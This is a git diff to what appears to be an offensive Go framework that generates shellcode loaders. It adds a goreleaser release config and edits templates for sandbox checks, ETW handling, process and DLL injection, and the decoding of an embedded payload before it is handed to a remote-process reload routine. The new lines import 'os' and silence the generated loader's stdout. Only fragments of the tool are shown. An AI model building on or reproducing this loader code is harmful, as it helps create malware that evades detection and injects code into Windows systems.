diff --git a/.goreleaser.yml b/.goreleaser.yml new file mode 100644 index 0000000..15327ae --- /dev/null +++ b/.goreleaser.yml @@ -0,0 +1,35 @@ +# This is an example goreleaser.yaml file with some sane defaults. +# Make sure to check the documentation at http://goreleaser.com +before: + hooks: + # You may remove this if you don't use go modules. + - go mod download + # you may remove this if you don't need go generate + - go generate ./... +builds: +- env: + - CGO_ENABLED=0 + goos: + - "darwin" + - "linux" + - "windows" + goarch: + - "amd64" +archives: + - name_template: "{{ .ProjectName }}_{{ .Version }}_{{ .Os }}_{{ .Arch }}" + format: binary + files: + - LICENSE.txt + - README.md +checksum: + name_template: '{{ .ProjectName }}_checksums.txt' +source: + enabled: false +snapshot: + name_template: "{{ .Tag }}-next" +changelog: + sort: asc + filters: + exclude: + - '^docs:' + - '^test:' diff --git a/Loader/Loader.go b/Loader/Loader.go index 478c0d2..0a05785 100644 --- a/Loader/Loader.go +++ b/Loader/Loader.go @@ -694,6 +694,7 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, } if sandbox == true { + Binary.Variables["SandboxOS"] = `"os"` Binary.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(4, 12) Binary.Variables["domain"] = Cryptor.VarNumberLength(4, 12) Binary.Variables["status"] = Cryptor.VarNumberLength(4, 12) @@ -720,6 +721,7 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, Binary.Variables["Sandbox"] = "" Binary.Variables["Sandboxfunction"] = "" Binary.Variables["SandboxImport"] = "" + Binary.Variables["SandboxOS"] = "" } if ETW == false { diff --git a/Struct/Struct.go b/Struct/Struct.go index 79cf2a0..cfeb86e 100644 --- a/Struct/Struct.go +++ b/Struct/Struct.go @@ -501,6 +501,7 @@ func Binary() string { "syscall" "unsafe" "strconv" + {{.Variables.SandboxOS}} "golang.org/x/sys/windows" "golang.org/x/sys/windows/registry" @@ -972,6 +973,7 @@ func Procces_Injection_DLL() string { "[loader]/[loader]" "io/ioutil" "syscall" + "os" "time" "unsafe" "strconv" @@ -1300,6 +1302,7 @@ func Start() { {{.Variables.hexdata}}, _ := base64.StdEncoding.DecodeString({{.Variables.rawdata}}) {{.Variables.raw_bin}}, _ := hex.DecodeString(string({{.Variables.hexdata}})) {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}}) + os.Stdout, _ = os.Open(os.DevNull) } @@ -1417,6 +1420,7 @@ func Procces_Injection() string { "time" "unsafe" "strconv" + {{.Variables.SandboxOS}} "golang.org/x/sys/windows" "golang.org/x/sys/windows/registry"